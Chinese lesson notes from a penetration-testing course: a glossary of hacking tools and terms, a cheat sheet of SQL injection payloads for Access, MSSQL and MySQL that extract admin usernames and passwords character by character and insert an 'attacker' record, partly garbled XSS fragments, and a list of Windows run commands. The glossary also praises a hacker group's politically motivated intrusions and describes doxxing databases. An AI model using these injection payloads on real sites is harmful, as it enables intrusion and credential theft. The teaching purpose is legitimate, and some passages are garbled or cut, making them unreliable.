第十课web渗透三部曲内容总结

1接下来我们对

前面的二本书和这一本的部分内容总结

这样子对我们后面的复习有更大的帮助

当然这里还会出现其他没有学习过的内容

我们后面会说

2认识web渗透三部曲

web渗透三部曲

web渗透与安全实战（基础）

web渗透与安全实战(扩展）

web渗透与安全实战（综合与复习）

2内容总结

1网络安全-是指网络系统的硬件、软件及其系统中的数据受到保护，不因偶然的或者恶意的原因而遭受到破坏、更改、泄露，系统连续可靠正常地运行，网络服务

2旁注-旁站注

3mt管理器-破解安卓应用反编译工具

40day漏洞-0日漏洞

5sqlmap-sql注入检测工具

6wireshark-抓包工具

7ollydbg-win破解应用反编译工具

8burpsuite-一个web攻击集成工具

9vmware-虚拟机工具

10zantl-中间人攻击

11driodsqli-手机版sql注入工具

12routersploit-路由器漏洞检测工具

13xss攻击-跨站脚本攻击

14sql注入-网站wed**恶意伐码

15ddos攻击-拒绝服务攻击

16kalilinux-一个集成了渗透测试工具的linux发行版系统

17弱口令-简单的密码如"12345abc"容易被破解出来

18肉鸡-傀儡机被黑客控制的计算机或者服务器

19抓鸡-黑客通过漏洞或者病毒入侵计算器服务器的过程

20dvwa-渗透测试靶场

21一句话木马-用于入侵网站服务器短小但是功能强大

22加固-一种用于保护应用程序不被的保护技术

23脱壳-去除应用加固的技术

24数字签名-一种用于保护应用不被破解的技术

25后门程序-恶意的程序通常潜伏在Windows系统，linux系统 或者某个公司服务器甚至国家服务器隐蔽性及强常用于盗取机密文件

26宏病毒-一种潜伏在办公软件文件的病毒如word和excel宏功能里面隐蔽性及强

27社工库-黑客和大数据。结合的产物用于存放泄露个人信息和用户数据只需要一个手机号或QQ号就可以查询对方泄露的信息

28人肉搜索-通过互联网媒价收集他人信息

其中社工库也是人肉搜索的一部分

29菠菜网站-菠菜网站是博彩网站的谐音

赌博会影响身体健康甚至家破人亡。所以珍爱生命，远离赌博

30社会工程学-黑客通过人性心理故意靠近一个人。从而达到。目的获取。自己想要的信息

31红客-中国的一个民间爱国黑客组织。曾经因为81192事件。入侵美国白宫官网并且挂上了五星红旗。和王伟的照片。一举成名。当然。他们的奉献不仅如此比如佩洛西访台湾事件。为了表达不满直接入侵的台湾网络并且将所有电视台网络切换成我和我的祖国奥运会网络维护等等

32暗网-互联网最底层的网络。需要特殊的方式授权登录。才可以。访问。并且用一种。隐蔽性极强的。货币交易。所以很难被追踪到

正因如此。所以暗网。也被称为黑暗版的淘宝。里面。充次着。各种违法犯罪交易

33阿d注入工具，明小子注入工具-sql注入工具

34wwwscan扫描工作，御剑扫描工具_后台。扫描工具

35root权限-linux PC端安卓移动端。最高权限。可对根目录进行修改

36中国菜刀。中国蚁剑-后台连接管理工具

37pr提权工具,黑协提权工具-服务器协提工具

38椰树扫描，流光pahglin，h**id-注入工具

39超级弱口令检测工具-Windows下的一款弱口令检测工具

40andrax-安卓渗透测试工具集成框架

41driddjack，spynote-安卓远程控制木马制作工具

42nmap-端口扫描工具

43文件上传攻击-攻击者利用Web应用对上传文件过滤不严的漏洞，将应用程序定义类型范围之外的文件上传到Web服务器，并且此类文件通常为木马，在上传成功后，攻击者即可获得当前的webshell

文件上传攻击实质上就是拿下网站的控制权，用户文件上传部分的控制不足或者处理缺陷，而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这些上传的文件可以是木马、病毒、恶意脚本或者WebShell等

44逻辑漏洞-基于开发人员设计程序的时候，逻辑不严密，导致攻击者可以修改、绕过或者中断整个程序，让程序按照开发人员的预料之外去执行。

45网页木马-黑客通过向网站植入木马一旦有人访问网站黑客就可以入侵对方的设备

46文件包含漏洞-　文件包含漏洞属于代码注入漏洞，为了减少重复代码的编写，引入了文件包含函数，通过文件包含函数将文件包含进来，直接使用包含文件的代码；简单来说就是一个文件里面包含另外一个或多个文件

47Windows pe-Windows的预安装环境

48破解软件-对软件原来的伐码进行修改

从而达到不花钱得到某个软件道具，会员，绕过登录等等

49远程桌面连接-Windows

下的一个功能只要开启了远程桌面连接功能的电脑可以使用其他电脑连接开启了远程桌面连接的电脑

50高危端口-容易被黑客入侵的端口

51黑客-一种通过技术破解他人软件非法入侵她人服务器的

52白客-网络安全渗透工程师专为某个公司或者组织国家工作 每天帮公司或者组织或者国家防御菲法入侵网络攻击

53Windowsver2012R2-一个Windows系统下的服务器搭建工具

54web服务器_一个基于网站架设服务器http协议建立连接

55爬虫-通过爬虫爬取网站无法下载的东西或者重要的信息

56linux-一个开源自由的操作系统

57Windows-微软的系统

58命令提示符-Windows系统下的提示命令输入工作符也叫cmd命令

59终端模拟器-linux和安卓系统下的提示命令输入工作符（这里注意安卓系统是基于linux系统内核开发的；）

60ip隐藏-隐藏原来的ip地址防址被追踪

61kalinethunter-一个安卓移动渗透测试集成工具自定义了一个kalilinuxchroot

62TCP/iP-网络传输协议

63internet_国际互联网

64验证绕过-绕过验证码登录

65msfvenom-一个后门程序制作工具

可以制作很多种木马

66url程定向-黑客通过网站url漏洞向网站**恶意钓鱼网站

67僵尸网络-被黑客值入了boot的服务器或者计算机发动网络攻击

68网页木马-黑客将网站文件伪装成普通文件实际上是有病毒的如果用户一旦点击就是被入侵

69cobaltstrike-一个后门程序制作工具

70Metasploit_源的安全漏洞检测工具

71hydra-九头蛇密码暴力破解工具

72medusa-美杜莎密码暴力破解工具

73中间人攻击-MITM攻击

78LOlc-DDOS攻击

79钓鱼wifl-黑客通过虚假伪造SSlD用户一旦连接上就会被入侵

80excel，word，ppt-微软办公三件套excel，word，ppt(office)套装

81防火墙-它是一种位于内部网络与外部网络之间的网络安全系统，可以将内部网络和外部网络隔离。在网络中，“防火墙”，是指一种将内部网和公众访问网（如Internet）分开的方法，实际上是一种隔离技术。

82进制-进制分为二进制、八进制、十进制与十六进制。他们是由0和1组成的指令而我们的计算机只可以识别二进制（在计算机的所有操作的0和1表示的 如我们写的伐码执行后都会变成二进制计算机才可以知道我们有干嘛）

83md5-一种加密技术通常用在网站后台密码加密

84ssh，vnc-一种远程连接电脑的技术

85Termux-安卓手机的高级终端比起其他的安卓终端他太功能太强大了就算手机没有root

也可以在手机上安装独立的linux系统，独立的Windows系统 还可以使用很多的渗透测试工具如SQLMAP,hydra，medusa，msfvenom等等工具还可以安装编程语言环境如python，J**a等等

86渗透测试-渗透测试指模拟攻击者入侵来评估计算机系统安全的行为，是一种授权的行为。

87Syn攻击-通过三次握手tcp建立发起数据包攻击（洪泛攻击）

88lnviziblepro-安卓用于隐藏IP地址的工具

89Anonym8-linux系统ip隐藏工具

90auto hide ip-Windows系统ip地址隐藏工具

include：91to Converter转换器-编程语言语法转换器如c++转python语法 　　92提权-黑客提高服务器中的权限通常用于入侵提权包括溢出提权，数据提权，luDF提权等等 　　93websell-asp，php，Jsp网页文件伐码执行环境 　　94exe，apk-exe是Windows系统的软件格式当然还有其他的如（MSI,  和 AppX以及），apk是安卓系统下的软件格式 　　95BruteXSS-一个自动化xss攻击工具 　　96域名 　　1国家域名 域名 国家 ru -俄罗斯 .au -澳大利亚 .kr -韩国 uk -英国 .fr- 法国 .jp -日本 .US- 美国 　　CN-中国🇨🇳 　　2常见域名 gov- 政府机构 .edu -教育机构 .int- 国际组织 .mil -军事部门 .com- 商业机构 .net -网络中心 .org -社会组织、专业协会 　　3其他域名 .aero 与航空相关的网站 .biz 商业领域 .museum 博物馆 .name 个人域名 pro 专业人士和组织 .info 网络信息服务 .coop 商业合作社 　　到此为止我们就介绍完了域名 　　97HTTP,-访问类超文本传输协议，HTML-超文本标记语音 　　98URL-统一资源站 　　99DNS-将域名转ip 　　98黄鸟抓包-安卓抓包工具 99 1946年美国发明了世界上第一台计算机名称缩写为ENIAC 100计算机cpu 主频=外频×倍屏 　　101cache-高速缓冲存储器 　　102ram(随机存储）可读可写断电数据丢失 　　rom（只读存储）可读不可写断电数据不丢失 　　103SQL注入语句 数字型：and 1=1 and 1=2 判断是否存在注入 字符型：' and '1'='1 ' and '1'='2 搜索型： 关键字%' and 1=1 and '%'='% 关键字%' and 1=2 and '%'='% 　　IIS报错情况下使用： and user>0 （判断是ACCESS还是MSSQL）不报错则使用各自数据库特性来判断 and (select count(*) from msysobjects)>0 （返回权限不足access数据库） and (select count(*) from sysobjects)>0 （返回正常则为MSSQL数据库） and db_name（）>0 (返回数据库名) and 0(select @@version)-- (判断版本信息) and db_name（）>0 （返回数据库名） 　　************注意：猜解之前先要找到后台地址，不然白忙了********** 　　ACCESS注入： 　　猜解表名（正常则存在admin,不正常则不存在） and exists (select * from [admin]) and (Select Count(*) from Admin)>0 　　猜解字段:（字段username存在则正常，不正常则不存在） and (Select username from Admin)>0 and exists (select username from [admin]) 　　猜解用户名和密码长度 and (select top 1 len(username) from Admin)>0 and (select top 1 len(password) from Admin)>0 原 理：如果top 1的username长度大于0，则条件成立；接着就是>1、>2、>3这样测试下去，一直到条件不成立为止，比如>4成 立，>5不成立，就是len(username)=5,即用户名长度为5.得到username的长度后，用mid(username,N,1)截 取第N位字符，再asc(mid(username,N,1))得到ASCII码. 　　猜解用户 and (select top 1 asc(mid(username,1,1)) from Admin)>0，1，2…, 　　当输入到109时，显示错误，而108之前显示正确，说明第一个字符的ASCII码为109.，得到第一个字符是m。 同理and (select top 1 asc(mid(username,2，1) from Admin)>0，1，2… 　　到114的时候不成立，说明第二个字符的ASCII码值为114，字符为r。 　　注意的是英文和数字的ASCII码在1-128之间... 　　MSSQL注入： h**ing 1=1-- 【爆出一个表名及字段，如：列 'users.ID' 在选择列表中无效】 group by users.ID h**ing 1=1-- group by users.ID, ername, users.password, users.privs h**ing 1=1-- ; insert into users values( 666, attacker, foobar, 0xffff )-- 【**新记录】 　　猜解表名： SQL SERVER的每一个数据库都会有用户表和系统表，在系统表sysobjects中， 数据库内创建的每个对象（约束、默认值、日志、规则、存储过程等）在sysobjects表中占一行，那么也就是说当前数据库的表名都会在该表内有存在。 我们常用到的参数有三个，name （数据表的名字），xtype（ 数据表的类型 u为用户表），id（ 数据表的对象标志）。 and (select top 1 name from sysobjects where xtype='u')>0 (得到第一个表名:比如user) and (select top 1 name from sysobjects where xtype='u' and name not in ('user'))>0 得到第二个表名，后面的以此类推。。 　　猜解列名：

用 到系统自带的2个函数col_name()和object_id()，col_name()的格式是“COL_NAME( table_id , column_id )”，参数table_id是表的标识号，column_id是列的标识号，object_id(admin)就是得到admin在sysobjects 中的标识号，column_id=1,2,3表明admin的第1，2，3列。

and (select top 1 col_name(object_id('admin'),1) from sysobjects)>0 【得到admin字段的第一个列名“username”依次类推，得到“password”“id”等等】

猜解字段内容：

and (select top 1 username from [admin])>0 【直接得到用户名】

and (select top 1 password from [admin])>0 【直接得到密码】

UNION联合查询：

select name,password,id from user union select user,pwd,uid from 表名

and 1=1 unionselect 1,2,3,4,5... from 表名 (数值从1开始慢慢加，如果加到5返回正常，那就存在5个字段)

ASCII逐字解码法：

1、猜解列长度

and (select top 1 len(列名)from 表名)>N

其中N是数字，变换这个N的值猜解列长度，当N为6正确，为7错误，则长度为7

猜解第二条记录就该使用：select top 1 len(列名) from 表名 where 列名 not in (select top 1 列名 from 表名)

2、猜解用户和密码

ASC()函数和Mid函数,ASC(mid(列名,N,1))得到“列名”第N位字符ASCII码

猜解语句为：and (select top 1 asc(mid(字段,1,1)) from 数据库名)>ASCII码

区间判断语句：....between......and......

中文处理法:当ASCII转换后为“负数”使用abs()函数取绝对值。

例：and (select top 1 abs(asc(mid(字段,1,1))) from 数据库名)=ASC码

ASCII逐字解码法的应用：

1、猜解表名：and (select count(*) from admin)0

2、猜解列名：and (select count(列名) from 表名)0

3、猜解用户个数：and (select count(*) from 表名)>1,2.. 2正常，3错误，表中有3条记录。

4、猜解用户名的长度：and (select len(列名) from 表名)>=1、>=2、>=3、>=4。

5、猜解用户名：and (select count(*)from 表名 where (asc(mid(列名,1,1))) between 30 and 130)0

最后提交：and (select asc(mid(列名,1,1)) from 表名)=ascii的值

6、猜解管理员的密码：

按照上面的原理，把上面的语句中(asc(mid(列名,1,1)的列名换成PASSWORD就能得到密码了。

MYSQL+PHP注入：

1.判断是否存在注入,加';and 1=1 ;and 1=2

2.判断版本 and ord(mid(version(),1,1))>51 代替。

3.判断数据库连接帐号有没有写权限，and (select count(*) from er)>0 onerror=alert(/xss/) width=150> ( 表示注释）

input {left:expression_r (alert('xss'))}

html 实体

unicode [/post]

到此为止SQL注入语句介绍完了

104Windows常用命令

1、winver——检查Windows版本

2、mem.exe——显示内存使用情况

3、sfc.exe——系统文件检查器

4、sfc /scannow——windows文件保护（扫描错误并复原）

5、chkdsk.exe——Chkdsk磁盘检查

6、cleanmgr——打开磁盘清理工具

7、lusrmgr.msc——本机用户和组

8、UserAccountControlSettings用户账户控制设置

9、taskschd.msc—— 任务计划程序

10、explorer——打开资源管理器

11、psr——步骤记录器

12、notepad——打开记事本

13、write ——写字板

14、mspaint——画图板

15、regedt32——注册表编辑器

16、logoff——注销命令

17、Sndvol32——音量控制程序

18、calc——启动计算器

19、wmimgmt.msc——打开windows管理体系结构(WMI)

20、wupdmgr——windows更新程序

21、wscript——windows脚本宿主设置

22、write——写字板

23、winmsd——系统信息

24、wiaacmgr——扫描仪和照相机向导

25、winchat——XP自带局域网聊天

26、msconfig——系统配置实用程序

27、mplayer2——简易widnowsedialayer

28、mstsc——远程桌面连接

29、mplayer2——媒体播放机

30、magnify——放大镜实用程序

31、mmc————打开控制台

32、mobsync——同步命令

33、dxdiag——检查DirectX信息

34、drwtsn32——统医生

35、devmgmt.msc——备管理器

36、dfrg.msc——磁盘碎片整理程序

37、diskmgmt.msc——磁盘管理实用程序

38、dcomcnfg——打开系统组件服务

39、dde*****——打开DDE共享设置

40、dvdplay——DVD播放器

41、nettopessenger——停止信使服务

42、nettartessenger——开始信使服务

43、nslookup——网络管理的工具向导

44、ntbackup——系统备份和还原

45、narrator——屏幕“讲述人”

46、ntmsmgr.msc——移动存储管理器

47、ntmsoprq.msc——移动存储管理员操作请求

48、netstatan——(TC)命令检查接口

49、syncapp——创建一个公文包

50、sysedit——系统配置编辑器

51、sigverif——文件签名验证程序

52、sndrec32——录音机

53、shrpubw——创建共享文件夹

54、secpol.msc——本地安全策略

55、syskey——系统加密，一旦加密就不能解开，保护windowsp系统的双重密码

56、services.msc——本地服务设置

57、TM任务管理器(新版)

58、tsshutdn——60秒倒计时关机命令

59、tourstart——xp简介（安装完成后出现的漫游xp程序）

60、taskmgr——任务管理器

61、eudcedit——造字程序

62、packager——对象包装程序

63、wf.msc——高级安全Windows防火墙

64、progman——程序管理器

65、regedit.exe——注册表

66、rsop.msc——组策略结果集

67、rononcep——15秒关机

68、regsvr32u.dll——停止dll文件运行

69、regsvr32uipfldr.dll——取消ZIP支持

70、cmd.exe——CMD命令提示符

71、certmgr.msc——证书管理实用程序

72、calc————启动计算器

73、charmap——启动字符映射表

74、cliconfg——SQLERVER户端网络实用程序

75、Clipbrd——剪贴板查看器

76、conf————启动netmeeting

77、compmgmt.msc——计算机管理

78、cleanmgr——垃圾整理

79、ciadv.msc——索引服务程序

80、osk————打开屏幕键盘

81、odbcad32——ODBC数据源管理器

82、oobe/msoobea——检查XP是否激活

83、iexpress——木马捆绑工具，系统自带

84、nslookup——IP地址侦测器

85、fsmgmt.msc——共享文件夹管理器

86、utilman——辅助工具管理器

87、gpedit.msc——组策略

88、control userpasswords2——用户帐户设置窗口

89、appwiz.cpl——程序和功能

90、chkdsk.exe——Chkdsk磁盘检查(管理员身份运行命令提示符)

91、cliconfg——SQL SERVER 客户端网络实用工具

92、cmstp——连接管理器配置文件安装程序

93、Shutdown -s -t 600——表示600秒后自动关机

94、shutdown -a ——可取消定时关机

95、Shutdown -r -t 600——表示600秒后自动重启

96、rundll32 user32.dll,LockWorkStation——表示锁定计算机

97、colorcpl——颜色管理，配置显示器和打印机等中的色彩

98、CompMgmtLauncher——计算机管理

99、credwiz——备份或还原储存的用户名和密码

100、comexp.msc——打开系统组件服务

101、control——控制面版

102、Dccw——显示颜色校准

103、devmgmt.msc——设备管理器

104、desk.cpl——屏幕分辨率

105、dfrgui——优化驱动器 Windows 7→dfrg.msc——磁盘碎片整理程序

106、dialer——电话拨号程序

107、diskmgmt.msc——磁盘管理

108、eventvwr——事件查看器

109、Firewall.cpl——Windows防火墙

110、FXSCOVER——传真封面编辑器

111、hdwwiz.cpl——设备管理器

112、inetcpl.cpl——Internet属性

113、intl.cpl——区域

114、joy.cpl——游戏控制器

115、lusrmgr.msc——本地用户和组

116、lpksetup——语言包安装/删除向导，安装向导会提示下载语言包

117、main.cpl——鼠标属性

118、mmsys.cpl——声音

119、mem.exe——显示内存使用情况(如果直接运行无效，可以先管理员身份运行命令提示符，在命令提示符里输入mem.exe>d:a.txt 即可打开d盘查看a.txt，里面的就是内存使用情况了。当然什么盘什么文件名可自己决定。)

120、MdSched:Windows内存诊断程序

121、mmc——打开控制台

122、mplayer2——简易widnows media player

123、Msconfig.exe——系统配置实用程序

124、msdt——微软支持诊断工具

125、msinfo32——系统信息

126、mspaint——画图

127、Msra——Windows远程协助

128、NAPCLCFG.MSC——客户端配置

129、ncpa.cpl——网络连接

130、Netplwiz——高级用户帐户控制面板，设置登陆安全相关的选项

131、OptionalFeatures——打开“打开或关闭Windows功能”对话框

132、osk——打开屏幕键盘

133、perfmon.msc——计算机性能监测器

134、perfmon——计算机性能监测器

135、PowerShell——提供强大远程处理能力

136、printmanagement.msc——打印管理

137、powercfg.cpl——电源选项

138、psr——问题步骤记录器

139、Rasphone——网络连接

140、Recdisc——创建系统修复光盘

141、Resmon——资源监视器

142、Rstrui——系统还原

143、sdclt——备份状态与配置，就是查看系统是否已备份

144、sfc /scannow——扫描错误并复原/windows文件保护

145、slui——Windows激活，查看系统激活信息

146、slmgr.vbs -dlv ——显示详细的许可证信息

147、slmgr.vbs -dli ——显示许可证信息

148、slmgr.vbs -xpr ——当前许可证截止日期

149、slmgr.vbs -dti ——显示安装ID 以进行脱机激

150、slmgr.vbs -ipk ——(Product Key)安装产品密钥

151、slmgr.vbs -ato ——激活Windows

152、slmgr.vbs -cpky ——从注册表中清除产品密钥(防止泄露引起的攻击)

153、slmgr.vbs -ilc ——(License file)安装许可证

154、slmgr.vbs -upk ——卸载产品密钥

155、slmgr.vbs -skms ——(name[ort] )批量授权

156、snippingtool——截图工具，支持无规则截图

157、timedate.cpl——日期和时间

158、StikyNot——便笺

159、sysdm.cpl——系统属性

160、eventvwr——事件查看器

到此为止Windows系统命令就介绍完成了

105HID攻击-攻击者通过将USB设备模拟成为键盘，让电脑识别成为键盘，然后进行脚本模拟按键进行攻击。

106John the ripper-一款免费、开源的暴力密码破解器

107BadUSB-利用USB固件中的固有漏洞的攻击，将一个写入了恶意代码的定制USB设备

108命令行注入-指web应用程序中调用了系统可执行命令的函数，而且输入参数是可控的，如果黑客拼接了注入命令，那么就可以执行dos命令之类的操作指令了

109Aircrack-一套用于破解WEP和WPA的工具套装，一般用于无线网络的密钥破解，从而非法进入未经许可的无线网络

110Metasploit-一款开源的安全漏洞检测工具，

111不安全验证码-Insecure CAPTCHA，

112wps漏洞-Wi-Fi保护设置（WPS）是一种简化无线网络配置的技术，可以通过输入PIN码或按下物理按钮的方式快速连接无线网络。然而，WPS存在一定的安全风险，可能导致WPA/WPA2-PSK密钥被破解。

里面的有一些没有的内容都是按照我的原笔记进行总结的后面会说这些内容如图